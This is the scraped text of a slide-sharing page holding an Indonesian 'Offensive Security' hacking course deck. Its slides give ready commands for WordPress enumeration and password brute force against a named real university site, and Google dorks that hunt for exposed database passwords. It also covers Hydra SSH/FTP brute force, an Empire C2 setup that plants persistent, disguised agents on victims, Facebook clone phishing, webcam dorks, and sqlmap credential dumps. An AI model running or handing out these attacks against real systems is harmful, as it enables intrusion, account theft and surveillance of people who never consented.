PDF Offensive Security V3 Linuxhackingid (New Version)

buatdownloadfile69 55 views 79 slides Jun 24, 2024
Slide 1
Slide 1 of 142
Slide 1
1
Slide 2
2
Slide 3
3
Slide 4
4
Slide 5
5
Slide 6
6
Slide 7
7
Slide 8
8
Slide 9
9
Slide 10
10
Slide 11
11
Slide 12
12
Slide 13
13
Slide 14
14
Slide 15
15
Slide 16
16
Slide 17
17
Slide 18
18
Slide 19
19
Slide 20
20
Slide 21
21
Slide 22
22
Slide 23
23
Slide 24
24
Slide 25
25
Slide 26
26
Slide 27
27
Slide 28
28
Slide 29
29
Slide 30
30
Slide 31
31
Slide 32
32
Slide 33
33
Slide 34
34
Slide 35
35
Slide 36
36
Slide 37
37
Slide 38
38
Slide 39
39
Slide 40
40
Slide 41
41
Slide 42
42
Slide 43
43
Slide 44
44
Slide 45
45
Slide 46
46
Slide 47
47
Slide 48
48
Slide 49
49
Slide 50
50
Slide 51
51
Slide 52
52
Slide 53
53
Slide 54
54
Slide 55
55
Slide 56
56
Slide 57
57
Slide 58
58
Slide 59
59
Slide 60
60
Slide 61
61
Slide 62
62
Slide 63
63
Slide 64
64
Slide 65
65
Slide 66
66
Slide 67
67
Slide 68
68
Slide 69
69
Slide 70
70
Slide 71
71
Slide 72
72
Slide 73
73
Slide 74
74
Slide 75
75
Slide 76
76
Slide 77
77
Slide 78
78
Slide 79
79
Slide 80
80
Slide 81
81
Slide 82
82
Slide 83
83
Slide 84
84
Slide 85
85
Slide 86
86
Slide 87
87
Slide 88
88
Slide 89
89
Slide 90
90
Slide 91
91
Slide 92
92
Slide 93
93
Slide 94
94
Slide 95
95
Slide 96
96
Slide 97
97
Slide 98
98
Slide 99
99
Slide 100
100
Slide 101
101
Slide 102
102
Slide 103
103
Slide 104
104
Slide 105
105
Slide 106
106
Slide 107
107
Slide 108
108
Slide 109
109
Slide 110
110
Slide 111
111
Slide 112
112
Slide 113
113
Slide 114
114
Slide 115
115
Slide 116
116
Slide 117
117
Slide 118
118
Slide 119
119
Slide 120
120
Slide 121
121
Slide 122
122
Slide 123
123
Slide 124
124
Slide 125
125
Slide 126
126
Slide 127
127
Slide 128
128
Slide 129
129
Slide 130
130
Slide 131
131
Slide 132
132
Slide 133
133
Slide 134
134
Slide 135
135
Slide 136
136
Slide 137
137
Slide 138
138
Slide 139
139
Slide 140
140
Slide 141
141
Slide 142
142

About This Presentation

Official From Linuxhackingid

Offensive Security is a proactive approach to cybersecurity that focuses on finding and exploiting weaknesses in systems before malicious attackers do.

Objectives of PDF Offensive Security:

Think Like an Ethical Hacker: Learn how to perform penetration testing to find...

Size: 40.3 MB
Language: en
Added: Jun 24, 2024
Slides: 79 pages

Slide Content

OFFENSIVE SECURITY
https://linuxhacking.or.id
ZSecurity
Version: 3

Linuxhackingid adalah sebuah organisasi cybersecurity yang didirikan pada tahun 2019. Mereka
memiliki fokus untuk membantu individu dan organisasi dalam mempelajari keamanan siber, baik
Offensive Security maupun Defensive Security
PROFILE
https://linuxhacking.or.id

OUR AUTHOR
ZSecurity
Founder Linuxhackingid
https://t.me/linuxhackingid [email protected] https://linuxhacking.or.id

BASIC PORT
NETWORK
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

PORT
https://t.me/linuxhackingid https://linuxhacking.or.id
Port adalah nomor yang mengidentifikasi titik akhir koneksi dan
mengarahkan data ke layanan tertentu
[email protected]

KATEGORI PORT NUMBER
Well-Known Ports 0-1023
Registered Ports 1024-49151
Dynamic ports 49152-65535
https://t.me/linuxhackingid https://[email protected]

NMAP PORT
SCANNING
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

PORT SCANNING
https://t.me/linuxhackingid https://linuxhacking.or.id
Port Scanning adalah metode yang menentukan port mana di jaringan
yang terbuka dan dapat menerima atau mengirim data.
[email protected]

TOOLS PORT SCANNING
https://t.me/linuxhackingid https://linuxhacking.or.id
Nmap
Netcat
Masscan
Advanced Port Scanner
TCPView
[email protected]

NMAP PORT SCANNER
https://t.me/linuxhackingid https://linuxhacking.or.id
nmap <IP Address/FQDN>
Contoh: nmap 192.168.23.1
nmap linuxhacking.or.id
4 Port yang terbuka
[email protected]

NMAP DETECT OS
https://t.me/linuxhackingid https://linuxhacking.or.id
Contoh: sudo nmap -O <IP Address/FQDN>
sudo nmap -O 192.168.0.1
[email protected]

DNS
ENUMERATION
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

DNS
https://t.me/linuxhackingid https://linuxhacking.or.id
DNS, atau Domain Name System, adalah sistem yang menerjemahkan nama
domain menjadi alamat IP. Ini seperti operator di buku telepon yang membantumu
menemukan nomor telepon yang tepat.
[email protected]

DNS ENUMERATION
https://t.me/linuxhackingid https://linuxhacking.or.id
https://dnsdumpster.com/
[email protected]

WORDPRESS
HACKING
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

WORDPRESS ENUMERATION
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo wpscan --url <IP Address/FQDN>
sudo wpscan --url https://www.uinsalatiga.ac.id
[email protected]

WORDPRESS USER ENUMERATION
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo wpscan --url <IP Address/FQDN> --enumerate u
sudo wpscan --url https://www.uinsalatiga.ac.id/ --enumerate u
[email protected]

WORDPRESS BRUTEFORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo wpscan --url <IP Address/FQDN> --passwords
/usr/share/wordlists/rockyou.txt --usernames admin
sudo wpscan --url https://www.uinsalatiga.ac.id/ --passwords
/usr/share/wordlists/john.lst --usernames admin
[email protected]

CMS ENUMERATION
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo cmseek
[email protected]

DAPETIN FILE DATABASE WORDPRESS
https://t.me/linuxhackingid https://linuxhacking.or.id
filetype:sql inurl:wp-content/*
[email protected]

DAPETIN CONFIG WORDPRESS
https://t.me/linuxhackingid https://linuxhacking.or.id
inurl:wp-config -intext:wp-config
"'DB_PASSWORD'"
[email protected]

VNC PASSWORD
DECRYPTOR
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

VNC PASSWORD DECRYPTOR
https://t.me/linuxhackingid https://linuxhacking.or.id
git clone https://github.com/jeroennijhof/vncpwd.git
cd vncpwd
make
./vncpwd ../.vnc/passwd
[email protected]

BRUTE FORCE
ATTACK
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

BRUTE FORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
metode peretasan yang menggunakan trial and error untuk memecahkan kata
sandi, kredensial login, dan kunci enkripsi.
Tools yang akan kita gunakan adalah Hydra.
[email protected]

HYDRA SERVICE SUPPORTED
adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-
{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s]
irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp
oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis
rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh
sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
https://t.me/linuxhackingid https://[email protected]

SSH BRUTEFORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
Spesifik Username dan Password
sudo hydra -l user -p ubuntu ssh://192.168.23.144 -t 10
Spesifik Username dan Password Wordlist
sudo hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://192.168.23.144 -t 10
Kredensial:
Target: 192.168.23.144
Username: user
Password: ubuntu
Service: SSH
[email protected]

SSH BRUTEFORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
Username Wordlist dan Spesifik Password
sudo hydra -L /usr/share/wordlists/legion/ssh-user.txt -p ubuntu
ssh://192.168.23.144 -t 10
Username Wordlist dan Password Wordlist
sudo hydra -L /usr/share/wordlists/legion/ssh-user.txt -P
/usr/share/wordlists/rockyou.txt ssh://192.168.23.144 -t 10
[email protected]

SSH BRUTEFORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
Kredensial berhasil didapat
[email protected]

FTP BRUTEFORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
Spesifik Username dan Password
sudo hydra -l user -p ubuntu ftp://192.168.23.144 -t 10
Spesifik Username dan Password Wordlist
sudo hydra -l user -P /usr/share/wordlists/rockyou.txt ftp://192.168.23.144 -t 10
Kredensial:
Target: 192.168.23.144
Username: user
Password: ubuntu
Service: FTP
[email protected]

FTP BRUTEFORCE ATTACK
https://t.me/linuxhackingid https://linuxhacking.or.id
Username Wordlist dan Spesifik Password
sudo hydra -L /usr/share/wordlists/legion/ssh-user.txt -p ubuntu
ftp://192.168.23.144 -t 10
Username Wordlist dan Password Wordlist
sudo hydra -L /usr/share/wordlists/legion/ssh-user.txt -P
/usr/share/wordlists/rockyou.txt ftp://192.168.23.144 -t 10
[email protected]

CRACKING
PASSWORD ZIP
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

CRACKING ZIP PASSWORD
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo apt install fcrackzip
sudo fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt test.zip
[email protected]

COMMAND AND
CONTROL
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

C2
https://t.me/linuxhackingid https://linuxhacking.or.id
Command and Control adalah komputer yang dikendalikan oleh penyerang
atau penjahat dunia maya yang digunakan untuk mengirim perintah ke
sistem yang disusupi malware dan menerima data curian dari jaringan target
[email protected]://t.me/linuxhackingid https://[email protected]

EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
Empire adalah kerangka kerja Command and Control (C2) terkenal yang
digunakan peretas dalam serangan dunia maya di dunia nyata. Ini telah
digunakan untuk menargetkan perusahaan-perusahaan besar melalui email
phishing, eksploitasi sistem TI yang bersifat publik, dan serangan-serangan
yang merugikan. Ini juga merupakan salah satu kerangka kerja C2 sumber
terbuka yang paling banyak digunakan oleh pentester dan Red Team
[email protected]://t.me/linuxhackingid https://[email protected]

KOMPONEN EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
Empire Server: digunakan untuk server C2
Empire Client: untuk berkomunikasi dengan server
[email protected]

INSTALL EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo apt install powershell-empire
[email protected]

RUNNING EMPIRE C2 SERVER
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo powershell-empire server
[email protected]

RUNNING EMPIRE C2 CLIENT
https://t.me/linuxhackingid https://linuxhacking.or.id
sudo powershell-empire client
[email protected]

SET LISTENER EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
uselistener http
set Port 1335
execute
back
[email protected]

SET STAGER EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
usestager windows_cmd_exec
set Listener http
generate
[email protected]

EKSEKSUSI AGENT DI KORBAN
https://t.me/linuxhackingid https://linuxhacking.or.id
Eksekusi hasil dari file yang sudah di buat oleh Empire ke korban
[email protected]

NEW AGENT EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
Setelah di eksekusi oleh target, akan muncul informasi bahwa agent dari
FZX6C23T dapat dieksekusi oleh attacker.
[email protected]

LIST AGENT EMPIRE C2
https://t.me/linuxhackingid https://linuxhacking.or.id
Agar kita dapat melihat agent yang sudah terkompromise dengan file kita, dapat
menjalankan perintah, agents
[email protected]

MENGHUBUNGKAN
AGENT KE KORBAN
https://t.me/linuxhackingid https://linuxhacking.or.id
perintah interact <ID> dapat menghubungkan ke target yang kita ingin eksekusi
[email protected]

EKSEKUSI COMMAND
KE KORBAN
https://t.me/linuxhackingid https://linuxhacking.or.id
perintah whoami dapat melihat user target yang menjalankan malware empire
[email protected]

MELIHAT ISI
DIRECTORY KORBAN
https://t.me/linuxhackingid https://linuxhacking.or.id
perintah dir dapat melihat isi directory target
[email protected]

PERSISTENT AKSES
Anda dapat melakukan persistent agar ketika laptop korban di restart atau
dimatikan, Anda masih dapat memiliki akses ke laptop korban.
usemodule powershell_persistence_elevated_schtasks
set Listener http
execute
https://t.me/linuxhackingid https://[email protected]

IMPERSONATE PROCESS ID
Anda dapat melakukan impersonate process agar ketika dilihat pada task
manager, malware kita menirukan proses yang ingin kita tirukan.
usemodule csharp_sharpsploit.credentials_impersonateprocess
set ProcessID <ID> (Dalam Contoh ini ID nya 6596 adalah ID notepad.exe)
execute
https://t.me/linuxhackingid https://[email protected]

AUTO
EXPLOITATION
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

AUTO EXPLOIT DENGAN
METASPLOIT PRO
https://t.me/linuxhackingid https://[email protected]
Pilih Quick Pentest dan masukan alamat IP Address target.
https://t.me/linuxhackingid https://[email protected]

PROSES SCANNING
METASPLOIT PRO
https://t.me/linuxhackingid https://[email protected]

SCANNED HOST DI
LINUXHACKINGID LAB
https://t.me/linuxhackingid https://[email protected]
SVCS: Services
VLNS: Vulnerabilities
ATT: Attempts

NETWORK TOPOLOGI
https://t.me/linuxhackingid https://[email protected]

DETAIL SERVICE PADA HOST
https://t.me/linuxhackingid https://[email protected]

AUTO EXPLOIT VULNERABILITIES
https://t.me/linuxhackingid https://[email protected]

TERDAPAT 3 SESSION
https://t.me/linuxhackingid https://[email protected]
Terdapat 3 session yang aktif yang dimana bisa dimanfaatkan untuk
mendapatkan akses di laptop korban

MASUK KE SHELL DARI
SALAH SATU SESSIONS
https://t.me/linuxhackingid https://[email protected]
Attacker bisa langsung kontrol
system target melalui terminal
Warna Kuning: Perintah eksekusi
dari attacker
Warna Putih: Hasil dari perintah
yang di eksekusi oleh attacker

METASPLOIT PRO REPORT
https://t.me/linuxhackingid https://[email protected]
Masuk tab Reports lalu pilih Create Standard
Report dan hasilnya terdapat pada gambar
sebelah kiri

METASPLOIT PRO
https://t.me/linuxhackingid https://[email protected]
Metasploit Pro: https://t.me/zsecur1ty

SQL INJECTION
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

DAPETIN DATABASE
PADA WEB PEMERINTAH
https://t.me/linuxhackingid https://[email protected]
https://youtu.be/cyBJQXmfUO4?si=nI_y3yxbqMOXu4h8

FREE VPS
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

VPS GRATIS
https://t.me/linuxhackingid https://[email protected]
https://youtu.be/7eBL3y2GbiI?si=qSO3R8YuGP1OGR7w

CHANGE IP
EVERY 5 SECOND
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

RUBAH ALAMAT IP
ADDRESS SETIAP 5 DETIK
https://t.me/linuxhackingid https://[email protected]
https://youtu.be/jl6hTOz9lEs?si=2DbjQDmGVMXep7h1

VULNERABILITY
SCANNER-NMAP
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

MENDETEKSI KERENTANAN
DENGAN NMAP
https://t.me/linuxhackingid https://[email protected]
nmap --script=vuln -p- <IP Address/FQDN>
nmap --script=vuln -p- 192.168.23.132

VULNERABILITY
SCANNER-INSIGHTVM
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

RAPID7 INSIGHTVM
VULNERABILITY SCANNER
https://t.me/linuxhackingid https://[email protected]
https://www.rapid7.com/products/insightvm/download/
Download:

INSIGHTVM LOGIN PAGE
https://t.me/linuxhackingid https://[email protected]

CREATE SITE SCAN
https://t.me/linuxhackingid https://[email protected]
Klik Create Site

CREATE NAME OF SCAN
https://t.me/linuxhackingid https://[email protected]

CEK IP ADDRESS TARGET
https://t.me/linuxhackingid https://[email protected]
IP Address:
192.168.23.132

SET IP ADDRESS TARGET
DI INSIGHTVM
Masuk ke Assets
dan input IP
Address Target
https://t.me/linuxhackingid https://[email protected]

SAVE DAN SCAN
klik Save and Scan
https://t.me/linuxhackingid https://[email protected]

HASIL DARI SCAN
Risk Score
https://t.me/linuxhackingid https://[email protected]
Risk Score adalah
tingkat keparahan
dari target melalui
perhitungan dari
Rapid7 Insightvm.
Dalam hal ini total
tingkat keparahan
dari sistem sebesar
365,760

LIST VULNERABILITY
vulnerability
https://t.me/linuxhackingid https://[email protected]
Terdapat 709
Vulnerability dari
sistem target
https://t.me/linuxhackingid https://[email protected]

INSIGHTVM CLOUD DASHBOARD
https://t.me/linuxhackingid https://[email protected]

VIDEO INSIGHTVM
https://t.me/linuxhackingid https://[email protected]
https://youtu.be/ACTK4qf4K84?si=onY2hCw0CFAzVgX-

BUFFER
OVERFLOW
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

BUFFER OVERFLOW
https://t.me/linuxhackingid https://[email protected]
buffer overflow terjadi ketika suatu program menulis data ke buffer di
luar memori yang dialokasikan, menimpa lokasi memori yang
berdekatan.

JENIS BUFFER OVERFLOW
https://t.me/linuxhackingid https://linuxhacking.or.id
Stack-based buffer overflows lebih umum terjadi, dan memanfaatkan
memori tumpukan yang hanya ada selama waktu eksekusi fungsi.
Heap-based attacks lebih sulit untuk dilakukan dan melibatkan
pembanjiran ruang memori yang dialokasikan untuk sebuah program di
luar memori yang digunakan untuk operasi runtime saat ini.
[email protected]

CONTOH STACK-BUFFER
OVERFLOW
https://t.me/linuxhackingid https://linuxhacking.or.id
Note: hanya menerima 9 karakter sebagai buffer
[email protected]
https://pastebin.com/SSZECSSv

CONTOH STACK-BUFFER
OVERFLOW
Contoh input melewati buffer
https://t.me/linuxhackingid https://linuxhacking.or.id
Contoh input tanpa melewati buffer
[email protected]
menandakan melibih buffer
yang diberikan, terletak di
angka 0 karena buffer hanya
diterima 9 karakter saja

MITIGASI BUFFER
OVERFLOW CODE
https://t.me/linuxhackingid https://linuxhacking.or.id
https://pastebin.com/F7bveezX
[email protected]
Fungsi std::cin.getline() memungkinkan Anda untuk
menentukan panjang maksimum string yang ingin
Anda baca
Tidak Error
https://t.me/linuxhackingid https://[email protected]

CONTOH HEAP-BUFFER
OVERFLOW
https://t.me/linuxhackingid https://linuxhacking.or.id
Salah satu contoh dari kerentanan sudoedit pada CVE-2021-3156
[email protected]
Vulnerable BoF
sudoedit -s '\' `perl -e 'print "A" x 65536'`
Exploit

BEBERAPA REGISTER
YANG PENTING
https://t.me/linuxhackingid https://linuxhacking.or.id
%rip: memberi tahu komputer dengan tepat baris instruksi mana yang harus
dibaca dan dijalankan selanjutnya.
%rsp: Register ini menyimpan alamat bagian atas tumpukan. Ini adalah
alamat dari elemen terakhir pada stack.
%rbp: Register %rbp biasanya di set ke %rsp pada awal fungsi. Hal ini
dilakukan untuk mencatat parameter fungsi dan variabel lokal.
[email protected]

PYTHON
HACKING
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

PACKET INJECTION
https://t.me/linuxhackingid https://[email protected]
https://pastebin.com/hFDLJ51X

PACKET INJECTION
https://t.me/linuxhackingid https://[email protected]
Berhasil me-injeksi
paket dengan
custom source IP
Address dan
Source Port

PYTHON HACKING COURSE
https://t.me/linuxhackingid https://[email protected]
https://linuxhacking.or.id/product/practi
cal-python3-hacking-for-beginner/

TRACKING LOCATION +
SOCIAL ENGINEERING
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

INSTALASI
https://t.me/linuxhackingid https://[email protected]
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh
https://github.com/thewhiteh4t/seeker

KONFIGURASI SEEKER
https://t.me/linuxhackingid https://[email protected]
./seeker.py
Sesuaikan Template yang Anda inginkan, dalam contoh ini pilih no 2
Sesuaikan dengan
keinginan Anda

TUNNELING
ssh -R 80:localhost:8080
[email protected]
https://t.me/linuxhackingid https://[email protected]
Fungsi Tunneling adalah agar IP Address dan Port Lokal dapat diakses dari luar jaringan
Link yang perlu
diakses
https://t.me/linuxhackingid https://[email protected]

TAMPILAN HALAMAN
https://t.me/linuxhackingid https://[email protected]

LIVE PRACTICAL SOCIAL
ENGINEERING TEST
https://t.me/linuxhackingid https://[email protected]

LOG SEEKER
https://t.me/linuxhackingid https://[email protected]

ADVANCED PHISHING
SIMULATION
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

ADVANCED PHISHING SIMULATION
METASPLOIT PRO
https://t.me/linuxhackingid https://[email protected]

Isi Project Name dengan
nama apapun
https://t.me/linuxhackingid https://[email protected]
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

Isi Name dengan nama apapun
https://t.me/linuxhackingid https://[email protected]
Klik yang dikotakan
Lalu klik Web Page
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

Pilih Phishing
https://t.me/linuxhackingid https://[email protected]
Masukan URL Redirect
ketika korban submit
phishing.
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Masuk ke menu Content
terletak di paling atas
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Klik Clone Website
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Dalam Contoh ini, kita
ingin membuat
phishing facebook,
copy link nya
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
paste Link yang ingin
ditirukan dan klik
Clone
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Klik Web Server
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Masukan DNS
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Klik Launch Campaign
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Hasil dari Cloning
Metasploit Pro
imitasi Domain
ADVANCED PHISHING SIMULATION
METASPLOIT PRO

https://t.me/linuxhackingid https://[email protected]
Hasil Phishing
ADVANCED PHISHING SIMULATION
METASPLOIT PRO
https://t.me/linuxhackingid https://[email protected]

METASPLOIT PRO
https://t.me/linuxhackingid https://[email protected]
Metasploit Pro: https://t.me/zsecur1ty

WEBCAM
HACKING
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

https://t.me/linuxhackingid https://[email protected]
intitle:"webcam 7" inurl:'/gallery.html'
WEBCAM HACKING

https://t.me/linuxhackingid https://[email protected]
WEBCAM HACKING

ACUNETIX WEB
VULNERABILITY
SCANNER
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

https://t.me/linuxhackingid https://[email protected]
ACUNETIX

https://t.me/linuxhackingid https://[email protected]
ACUNETIX
Membuat target baru

Masukan domain target
yang ingin kita scan
https://t.me/linuxhackingid https://[email protected]
ACUNETIX
Jika sudah klik Save

Klik Scan
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

Hasil Scanning
Acunetix
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

Hasil
Vulnerabilities,
Terdapat 181
temuan kerentanan
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

Detail
Vulnerability
SQL Injection
https://t.me/linuxhackingid https://[email protected]
ACUNETIX
Exploit POC

HTTP Request
Exploit
Detail
Vulnerability
SQL Injection
https://t.me/linuxhackingid https://[email protected]
ACUNETIX
Detail Vulnerability
SQL Injection
Proof Vulnerability
SQL Injection

Validasi kerentanan
SQL Injection
https://t.me/linuxhackingid https://[email protected]
ACUNETIX
URL Request

Hasil Crawling
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

Dari hasil temuan dari Acunetix, dapat
langsung diimport ke WAF (Web
Application Firewall, yang nantinya akan
melakukan virtual patching dari sisi
firewall
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

Reporting Executive Summary
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

Template report yang
tersedia pada Acunetix
https://t.me/linuxhackingid https://[email protected]
ACUNETIX

ACUNETIX
https://t.me/linuxhackingid https://[email protected]
Acunetix: https://t.me/zsecur1ty

ACUNETIX SQLMAP
= DATABASE DUMP
EXPLORE THE DARKSIDE: MASTER THE ART OF
ETHICAL HACKING
The Red Team isn't always successful in
its attacks, and the Blue Team doesn't
always successfully defend.
ZSecurity

HTTP Request
Exploit
https://t.me/linuxhackingid https://[email protected]
ACUNETIX + SQLMAP
HTTP Response
Exploit

URL Exploit
https://t.me/linuxhackingid https://[email protected]
ACUNETIX + SQLMAP

sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch
https://t.me/linuxhackingid https://[email protected]
ACUNETIX + SQLMAP
Hasil Database

sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables --batch
https://t.me/linuxhackingid https://[email protected]
ACUNETIX + SQLMAP
Hasil Tables

sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns --batch
https://t.me/linuxhackingid https://[email protected]
ACUNETIX + SQLMAP
Hasil Kolom

sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C name,email,pass --dump --batch
https://t.me/linuxhackingid https://[email protected]
ACUNETIX + SQLMAP
Hasil Data dalam kolom

PERTANYAAN?
https://t.me/linuxhackingid https://[email protected]
Jika terdapat pertanyaan dapat kontak melalui:
https://t.me/zsecur1ty
https://www.instagram.com/linuxhackingid_official/

TERIMAKASIH
https://t.me/linuxhackingid https://[email protected]
Tags
Categories
Design
Download
Download Slideshow Get the original presentation file
Quick Actions
Statistics
  • Views 55
  • Slides 79
  • Age 524 days
Related Slideshows
MGV Residential Design projects for different clients, including a New Mexico Adobe project-1-.pdf 1
MGV Residential Design projects for different clients, including a New Mexico Adobe project-1-.pdf
mannyvesa
26 views
EUNITED_Advocacy and Public Engagement through Visual Media 16
EUNITED_Advocacy and Public Engagement through Visual Media
GeorgeDiamandis11
30 views
DESIGN THINKINGGG PPT 2 TOPIC IDEATION.pptx 31
DESIGN THINKINGGG PPT 2 TOPIC IDEATION.pptx
HibaZaidi2
24 views
DESIGN THINKING CHAPTER 1 PPTT PPT 1.pptx 36
DESIGN THINKING CHAPTER 1 PPTT PPT 1.pptx
HibaZaidi2
27 views
Hinduism and Its History - PowerPoint Slides.pptx 112
Hinduism and Its History - PowerPoint Slides.pptx
ConorMcCormack10
23 views
Service Attributes of Manufactured Parts.pptx 20
Service Attributes of Manufactured Parts.pptx
MustafaEnesKrmac
24 views
View More in This Category